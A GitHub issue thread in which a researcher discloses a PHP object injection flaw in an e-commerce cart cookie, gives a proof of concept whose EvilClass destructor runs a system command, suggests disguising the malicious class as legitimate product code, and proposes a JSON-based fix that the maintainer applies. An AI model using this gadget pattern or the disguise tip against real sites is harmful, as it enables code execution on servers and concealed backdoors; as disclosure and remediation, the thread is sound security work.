kirilkirkov
Found a Vulnerability in the code
Dear reader(s),
I have found a vulnerability in the code. Can you please share the contact details to report a vulnerability I have found or enable the security policy so that I can fill a report? Awaiting the response and suggested next steps.
Kind Regards,
R.
Hello @remhopster-isdp You can share the report here and i will fix the vulnerabilities which you found. Thank you
PHP Object Injection
Summary
Using unserialize() on untrusted user input, such as data from cookies, can lead to serious security vulnerabilities, including PHP Object Injection attacks. Upon inspection and testing of the code of the platform, it was found that PHP Object Injection is possible by crafting a malicious "Evil class". By taking control of the content of the laraCart cookie, I was able to create a serialized payload. This allowed me to read files and execute arbitrary code, demonstrating the potential for Arbitrary Code Execution.
Details
The vulnerable code is found in \\app\\Cart.php in the private function "getCartProductsIds()". Vulnerable code:
if (isset($_COOKIE['laraCart']) && $_COOKIE['laraCart'] == null && !empty($_COOKIE['laraCart'])) {
$_SESSION['laraCart'] = unserialize($_COOKIE['laraCart']);
PoC
Start: Add an extra class to Cart.php. In this case, we created "EvilClass" to demonstrate how I could exploit the vulnerability.
class EvilClass
{
public function __destruct()
{
// code executed
//phpinfo();
system('cmd /c dir > C:\\windows\temp\EvilGdump.txt');
}
}
// Craft malicious serialized string
$maliciousData = serialize(new EvilClass());
// Set the cookie with the malicious data
setcookie('laraCart', $maliciousData, time() + 3600, '/');
// Simulate accessing the vulnerable method
$cart = new Cart();
$cart->getCartProductsIds();
and set the function public of the class getCartProductsIds() in Cart,php:
public function getCartProductsIds()
If you don't set the function to public of getCartProductsIds(), the user will get an error message by going to the index page. But "system('cmd /c dir > C:\\windows\\temp\\EvilGdump.txt');" has run. When set on public the command will also be executed by loading the page, but the user will see the normal website.
POC of EvilGdump.txt
Running the command "phpinfo()" (see also the code) phpinfo - Request_URI and Script_name
Injection in Cookie laraCart:
Possible Real world scenario: Make it more difficult for a user or developer to spot. By creating a new file with the class name 'prodclass.php', include the same code but replace 'Evil' and 'malicious' with other words like 'prods'. 'productItms', and call the class in Cart.php. Harder to detect and looks like legit code.
Solution
Use JSON encoding/decoding. Code example (not tested!):
private function getCartProductsIds()
{
$products = array();
if (!isset($_SESSION['laraCart']) || empty($_SESSION['laraCart'])) {
if (isset($_COOKIE['laraCart']) && !empty($_COOKIE['laraCart'])) {
$cookieData = json_decode($_COOKIE['laraCart'], true);
if (json_last_error() === JSON_ERROR_NONE) {
$_SESSION['laraCart'] = $cookieData;
}
}
} else {
$products = $_SESSION['laraCart'];
}
return $products;
}
With JSON encoding and decoding, you avoid the risks associated with PHP's unserialize() function, as JSON does not support object serialization and hence does not invoke any magic methods like __wakeup() or __destruct(). This way, the application is safer from object injection attacks.
Impact
A03:2021 - Injection OWASP-top 10 PHP object injection is a vulnerability that occurs when untrusted user input is deserialized into a PHP object. This can lead to various security risks, including arbitrary code execution, data tampering, and unauthorized actions.
Affected: End-Users / Companies Users and companies using vulnerable web applications may have their personal and sensitive information exposed or manipulated. They could also be subjected to unauthorized actions or service disruptions.
Affected Products: other Severity: Estimated - 7.2
CVE-ID: Not yet provided.
@remhopster-isdp The issue was resolved with this commit - https://github.com/kirilkirkov/Ecommerce-Laravel-Bootstrap/commit/a02111a674ab49f65018b31da3011b1e396f59b1
Hi Kiril,
Great that the vulnerability is fixed.
Can you assign a CVE-ID for the vulnerability so that people are can track this and also can update the code. And for me it will help enormously in my new career path.
Kind Regards,
R.
Op wo 3 jul 2024 om 19:28 schreef Kiril Kirkov @.***>:
@remhopster-isdp https://github.com/remhopster-isdp The issue was resolved with this commit - a02111a https://github.com/kirilkirkov/Ecommerce-Laravel-Bootstrap/commit/a02111a674ab49f65018b31da3011b1e396f59b1
— Reply to this email directly, view it on GitHub https://github.com/kirilkirkov/Ecommerce-Laravel-Bootstrap/issues/18#issuecomment-2206863135, or unsubscribe https://github.com/notifications/unsubscribe-auth/BBNQI4533D2BAM553TLZ5NTZKQYDLAVCNFSM6AAAAABJ4D35OCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDEMBWHA3DGMJTGU . You are receiving this because you were mentioned.Message ID: @.***>
Hi Kiril,
Hope you are doing well. I am curious if you can give an update on the CVE-ID?
kind Regards,
R.
Thanks Kiril,
But is there a difference between the project Ecommerce Laravel or Ecommerce codegniter?
I think there are also forks from Laravel which are used as commercial platform.
Can we ask github security team? And await their respons?
Kind regards,
R
Op ma 15 jul 2024 15:47 schreef Kiril Kirkov @.***>:
I am not sure that is possible for that project @remhopster-isdp https://github.com/remhopster-isdp ?
— Reply to this email directly, view it on GitHub https://github.com/kirilkirkov/Ecommerce-Laravel-Bootstrap/issues/18#issuecomment-2228548173, or unsubscribe https://github.com/notifications/unsubscribe-auth/BBNQI45AZHQYM3LN7MRTZ7LZMPHFZAVCNFSM6AAAAABJ4D35OCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDEMRYGU2DQMJXGM . You are receiving this because you were mentioned.Message ID: @.***>
@remhopster-isdp Yes, they are different platforms and yes they are used for Ecommerce as they are